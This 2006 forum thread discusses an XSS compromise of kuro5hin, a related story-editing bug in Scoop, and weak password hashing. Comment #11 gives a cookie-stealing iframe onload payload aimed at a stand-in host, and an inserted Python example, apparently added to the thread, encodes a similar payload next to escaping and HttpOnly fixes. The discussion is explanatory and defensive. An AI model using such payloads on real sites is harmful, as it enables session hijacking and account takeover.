Hi peeps
I've had to turn off the ability to edit your own story for a while.

Update [2006-6-15 8:47:32 by hulver]: Important information about passwords inside.
I should have posted this to the scoop-dev mailing list first really, but I've been sat on this for a while.

After k5 got hacked I don't want to take any chance. Hopefully I'll get this fixed tonight and turn the settings back on.
Passwords

The scoop method of storing passwords is horribly weak. It's entirely possible to brute force every password < 6 characters within a couple of days. You could search the entire 8 character (yes, it only stores 8 characters of your password) password space in a couple of months. Less on a faster computer. A dictionary search could be done in a couple of hours.
So, if you use the same password for k5 anywhere else, I suggest you change it. I don't know if whoever hacked k5 took a dump of the user database, but seeing as they had access to it to at least run "UPDATE USERS SET perm_group = 'Superuser'" it's a possibility.

Hi peeps | 28 comments (28 topical, 0 hidden) | Trackback
*Open* source, eh? by yicky yacky (4.00 / 1) #1 Thu Jun 15, 2006 at 12:59:07 AM EST
;)
----
Vacuity abhors a vacuum.
don't worry by martingale (4.00 / 3) #2 Thu Jun 15, 2006 at 01:02:38 AM EST
You're safe as long as the exploit doesn't get published on a buglist by a windows security company.
--
$E(X_t|F_s) = X_s,\quad t > s$
Was it a story editing bug then? by priestess (4.00 / 1) #3 Thu Jun 15, 2006 at 01:11:49 AM EST
I thought someone said it was just a Cross Site Scripting thing, which presumably means they can put whatever script it was into the story without having to use the Story Edit function?

Maybe the Story Edit function doesn't do all the filtering and checking that the original post story does? A hole in the filter-out-the-XSS functions I guess.

Hey ho, I never seem to post stories anyway really.

Pre........
---------
Chat to the virtual me...

K5 was an xss bug by hulver (4.00 / 1) #6 Thu Jun 15, 2006 at 01:29:46 AM EST
There were two bugs. One in the search page (now fixed). And one in the "Edit your own story" code.

I've fixed the search xss bug on HuSi, but the "Edit your own story" bug is still there. k5 doesn't let users edit their own stories so they're not vulnerable.

Any scoop site that does, is.
--
Cheese is not a hat. - clock

[ Parent ]
K5 got hacked? by IEFBR14 (4.00 / 12) #4 Thu Jun 15, 2006 at 01:19:12 AM EST
How could they tell?

Search started working by Rogerborg (2.00 / 0) #21 Thu Jun 15, 2006 at 11:32:56 AM EST
Not to worry, ruston put it back the way it should be again.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]
I can still see the edit button by gpig (4.00 / 1) #5 Thu Jun 15, 2006 at 01:25:15 AM EST
and get to the edit page.
---
(,   ,') -- eep
D'oh! by hulver (4.00 / 1) #7 Thu Jun 15, 2006 at 01:30:33 AM EST
I turned the wrong permission off.

Thanks.
--
Cheese is not a hat. - clock

[ Parent ]
Ever since you by joh3n (4.00 / 2) #8 Thu Jun 15, 2006 at 02:42:31 AM EST
outsourced the customer service call center to India, this website has gone downhill. Downhill, I say!  I demand my money back!

----
I am a crime against humanity
-theantix

k5 got hacked? by blixco (4.00 / 1) #9 Thu Jun 15, 2006 at 03:00:32 AM EST
I wanna read all about it!  Links, anyone?
---------------------------------
Taken out of context I must seem so strange - Ani DiFranco
Rusty's diary by hulver (4.00 / 1) #10 Thu Jun 15, 2006 at 03:12:18 AM EST
http://www.kuro5hin.org/story/2006/6/14/18650/8795

Not much on the details though. I'd like to know exactly how they did it. I'm betting they stole an admin user's session cookie.
--
Cheese is not a hat. - clock

[ Parent ]
If I were to have done it by gazbo (4.00 / 1) #11 Thu Jun 15, 2006 at 03:28:21 AM EST
I'd create a link to a search page, and one of the search URL parameters (say, the search type) would be a URL encoded version of a bit of HTML and event handlers - something like:


<iframe onload="window.location = 'http://my.site.com/pwned.html?cookie=' + document.cookie;" />

So that is echoed back to the user inside a table cell, and as it loads (iframe is used solely for the onload event handler) it broadcasts the cookie to whoever is interested.

I've not tried this or even thought about it too hard, but looking at the patch I can't see why this wouldn't work - specifically I'm not sure why a buffer overflow was mentioned at all.


I recommend always assuming 7th normal form where items in a text column are not allowed to rhyme.

[ Parent ]
Me too by hulver (4.00 / 1) #12 Thu Jun 15, 2006 at 03:41:24 AM EST
I'd have done something similar.

I think buffer overflow was mentioned because somebody saw "%3F%4E" etc in the url and thought "I don't understand that, it must be a buffer overflow".

If it was originally linked to last measure or something similar then it was fairly un-subtle. Good way to announce "I've found a hole, ha ha", but not a good way to permanently take over the site.

A determined attacker could have just made themselves an admin user and modified the cabal box to not display their name. They could then have had weeks to do whatever they liked. Maybe they did.

Note to self. Add "http-only" flag to cookies. Not that it helps for firefox.
--
Cheese is not a hat. - clock

[ Parent ]
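The two fixes the thread converges on, as an added example (not Scoop's code): HTML-escape a reflected search parameter before echoing it into the results table, and mark the session cookie HttpOnly so document.cookie cannot read it. The URL, the "type" parameter name and the cookie name are assumptions for the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a search URL whose "type" parameter carries a URL-encoded
# onload iframe of the kind described above (the decoded payload is in the thread).
SAMPLE_SEARCH_URL = (
    "http://example.invalid/search?string=hello&type="
    "%3Ciframe%20onload%3D%22window.location%3D'http%3A//attacker.invalid/p%3Fc%3D'"
    "%2Bdocument.cookie%3B%22%20/%3E"
)


def search_type_param(url: str) -> str:
    """Decode the 'type' query parameter the way a CGI would (parameter name assumed)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("type", [""])[0]


def render_cell_unsafe(value: str) -> str:
    """The reflected-XSS shape: the parameter is echoed into a table cell verbatim."""
    return f"<td>Search type: {value}</td>"


def render_cell_safe(value: str) -> str:
    """Hardened: escape <, >, & and both quote characters before echoing."""
    return f"<td>Search type: {html.escape(value, quote=True)}</td>"


def live_tag_count(fragment: str) -> int:
    """Count tag starts in a fragment; a correctly rendered cell has exactly two (<td>, </td>)."""
    return len(re.findall(r"<[a-zA-Z/]", fragment))


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie carrying the HttpOnly flag hulver notes; cookie name assumed."""
    return f"Set-Cookie: session={session_id}; Path=/; HttpOnly"


if __name__ == "__main__":
    payload = search_type_param(SAMPLE_SEARCH_URL)
    print("decoded parameter:", payload)
    print("unsafe cell tags:", live_tag_count(render_cell_unsafe(payload)))
    print("safe cell tags:  ", live_tag_count(render_cell_safe(payload)))
    print(session_cookie_header("example-session-id"))
```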
Rusty's most recent diary by gazbo (4.00 / 1) #16 Thu Jun 15, 2006 at 06:55:19 AM EST
Has a link to a full explanation.

The long and short of it is that it's what we said.


I recommend always assuming 7th normal form where items in a text column are not allowed to rhyme.

[ Parent ]
Yes. by aphrael (4.00 / 1) #20 Thu Jun 15, 2006 at 09:50:18 AM EST
We were very lucky in that the hacker in question wasn't subtle. He called attention to himself rather than slowly worming his way in.
If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]
He says by Rogerborg (2.00 / 0) #22 Thu Jun 15, 2006 at 11:34:30 AM EST
First, you steal all the money.  THEN you invite a mob in to burn down the bank and hide the evidence.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]
there's money to steal at k5? by aphrael (4.00 / 1) #23 Thu Jun 15, 2006 at 12:07:49 PM EST
Well, a yacht by Rogerborg (2.00 / 0) #24 Thu Jun 15, 2006 at 01:56:08 PM EST
I am not going to get started on the CMF slush fund, I am not going to get started on the CMF slush fund.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]
too late. by aphrael (2.00 / 0) #25 Thu Jun 15, 2006 at 02:03:43 PM EST
besides, how many years has it been? what's your burn rate?
If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]
so you're saying by aphrael (4.00 / 1) #26 Thu Jun 15, 2006 at 02:04:07 PM EST
Passwords by jimgon (2.00 / 0) #13 Thu Jun 15, 2006 at 04:14:37 AM EST
Thanks for that.  I hadn't thunk about it.
---------------
Technician - "We can't even get decent physical health care. Mental health is like witchcraft here."
Or by komet (2.00 / 0) #14 Thu Jun 15, 2006 at 06:19:23 AM EST
one might elect to not change one's password on an unimportant site and wait and see if anyone else logs in.

It would be great if Scoop could show you the IPs you've used to log in in the last 7 days or so. Would that be hard to code?

--
<ni> komet: You are functionally illiterate as regards trashy erotica.

No by hulver (2.00 / 0) #15 Thu Jun 15, 2006 at 06:22:32 AM EST
Not at all.
--
Cheese is not a hat. - clock
[ Parent ]
There you go by hulver (4.00 / 4) #17 Thu Jun 15, 2006 at 06:58:21 AM EST
http://www.hulver.com/scoop/ip
--
Cheese is not a hat. - clock
[ Parent ]
you rule by komet (4.00 / 1) #18 Thu Jun 15, 2006 at 07:04:06 AM EST
that's great.

--
<ni> komet: You are functionally illiterate as regards trashy erotica.
[ Parent ]
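The login-history view komet asks for above, as an added example (not the code behind hulver's page): given per-login records, list the IPs a user has logged in from in the last 7 days and flag any the user does not recognise. The records and the "known IPs" set are constructed for the demo.

```python
from datetime import datetime, timedelta

# Constructed sample login records (user, source ip, timestamp) standing in for
# what a Scoop-style site would record on each successful login.
SAMPLE_LOGINS = [
    ("komet",  "192.0.2.10",   "2006-06-08 09:12:00"),
    ("komet",  "192.0.2.10",   "2006-06-14 22:40:00"),
    ("komet",  "198.51.100.7", "2006-06-15 03:05:00"),
    ("komet",  "192.0.2.10",   "2006-06-01 10:00:00"),  # older than 7 days, ignored
    ("hulver", "203.0.113.5",  "2006-06-15 01:00:00"),
]

TS_FORMAT = "%Y-%m-%d %H:%M:%S"


def recent_login_ips(logins, user, now, days=7):
    """Return {ip: (first_seen, last_seen, count)} for `user` within the last `days`.

    `now` is a timestamp string in TS_FORMAT so callers need no datetime import.
    """
    cutoff = datetime.strptime(now, TS_FORMAT) - timedelta(days=days)
    seen = {}
    for who, ip, ts in logins:
        if who != user:
            continue
        t = datetime.strptime(ts, TS_FORMAT)
        if t < cutoff:
            continue
        first, last, n = seen.get(ip, (t, t, 0))
        seen[ip] = (min(first, t), max(last, t), n + 1)
    return seen


def unexpected_ips(logins, user, now, known_ips, days=7):
    """IPs in the recent list that the user did not claim as their own: the thing to watch for."""
    return sorted(ip for ip in recent_login_ips(logins, user, now, days) if ip not in known_ips)


if __name__ == "__main__":
    now = "2006-06-15 07:00:00"
    for ip, (first, last, n) in recent_login_ips(SAMPLE_LOGINS, "komet", now).items():
        print(f"{ip:15} first {first} last {last} logins {n}")
    print("unrecognised:", unexpected_ips(SAMPLE_LOGINS, "komet", now, {"192.0.2.10"}))
```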
i don't believe they ran that query. by aphrael (2.00 / 0) #19 Thu Jun 15, 2006 at 09:48:43 AM EST
i think they used the groups editor to add rights to low level groups.
If television is a babysitter, the internet is a drunk librarian who won't shut up.
please email me by janra (2.00 / 0) #27 Fri Jun 16, 2006 at 02:55:49 PM EST
I'd like to know where in the code you see this thing with the password being chopped down to 8 characters, because I don't see anything like that in the cvs code.

What I see is the entire password supplied by the user being passed to Crypt::UnixCrypt for encrypting, and the salt being chopped off.

Also I'd like to know what you found in terms of story editing... I may have found the same one not too long ago.
--
Discuss the art and craft of writing

It ain't scoop that is doin' the choppin... by coryking (2.00 / 0) #28 Sun Jun 18, 2006 at 08:13:38 PM EST
It is the Crypt::UnixCrypt library.
-------------
Dog food. Snack for some. Feast for others.

[ Parent ]